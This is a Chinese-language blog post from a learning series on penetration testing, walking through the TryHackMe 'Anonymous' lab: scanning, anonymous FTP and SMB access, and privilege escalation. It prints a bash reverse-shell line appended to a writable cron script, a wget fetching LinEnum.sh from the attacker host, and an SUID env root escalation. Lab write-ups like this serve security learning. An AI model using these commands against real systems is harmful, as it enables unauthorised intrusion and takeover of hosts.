iT邦幫忙

2021 iThome 鐵人賽

DAY 10
0
Security

我想學滲透測試喵喵喵喵!!!!系列 第 10

[Day10] THM Anonymous

今天來解比較綜合的題目,Try Hack Me 上面的 Anonymous。

  • 網址:https://tryhackme.com/room/anonymous
  • IP : 10.10.142.45

掃 Port

  • 掃 Port 起手式
    • rustscan -a 10.10.142.45 -r 1-65535 --ulimit 5000
      • 發現有開的 Port 是
      • 22 , 21 , 139 , 445
    • nmap -A -p21,22,139,445 10.10.142.45
      • 21 : FTP
        • VSFTPD 2.0.8
      • 22 : SSH
      • 139: SMB
      • 445: SMB

FTP

  • 嘗試連接 ftp
    • ftp 10.10.142.45 使用 anonymous 登入
    • 發現裡面有一個 scripts 資料夾
      • 先把裡面所有檔案都載下來
        • 下載 FTP 的檔案可以用 get {檔名}
  • 觀察檔案
    • clean.sh
      • 看起來是一段 清除資料的 bash script
    • removed_files.log
      • 看起來東西都是空的,是上述腳本的輸出
    • to_do.txt
      • 看起來沒有很重要

SMB

  • 嘗試連線 SMB
    • 發現有一個 pics 資料夾
    • 裡面有兩張圖片
    • 把兩張圖片載下來
      • 一樣可以使用 get 指令
  • 觀察圖片
    • 看起來是狗勾!
    • 用 Exif tool 觀察
      • 可以看出 Photoshop 編輯過
    • 但這些圖片貌似看不出什麼蛛絲馬跡

弱點利用

  • 突然想到,說不定 ftp 上面的 clean.sh 是一個 cron job
    • 也就是說,它可能定時會執行一次
    • 我們既然有對 FTP 的讀寫的權限,可以在上面戳個 reverse shell 再傳上去
    • echo bash -c "'bash -i >& /dev/tcp /10.13.21.55/7877 0>&1'" >> clean.sh
    • 本地端開 nc -nlvp 來接
  • 成功接上ㄌ
    • 取得 User flag

提權

  • 起手式 sudo -l
    • 看起來沒東西 QQ
  • 準備 Linenum 自動化枚舉程式
    • wget 10.13.21.55:8000/LinEnum.sh
    • 掃到了 /usr/bin/env 有 suid
  • 透過 GTFOBins 尋找 env SUID 提權
    • 發現輸入 /usr/bin/env /bin/sh -p 即可提權
  • 成功提權
    • 取得 Root Flag

心得

這一題告訴了我們,觀察可以讀寫的 bash shell 檔案,如果剛好遇到 Cron job,就有機會可以寫入 Reverse shell。另外也可以透過自動化枚舉程式,快速的找到可以用來提權的弱點。


上一篇
[Day9] THM Pickle Rick
下一篇
[Day11] THM Bounty Hacker
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言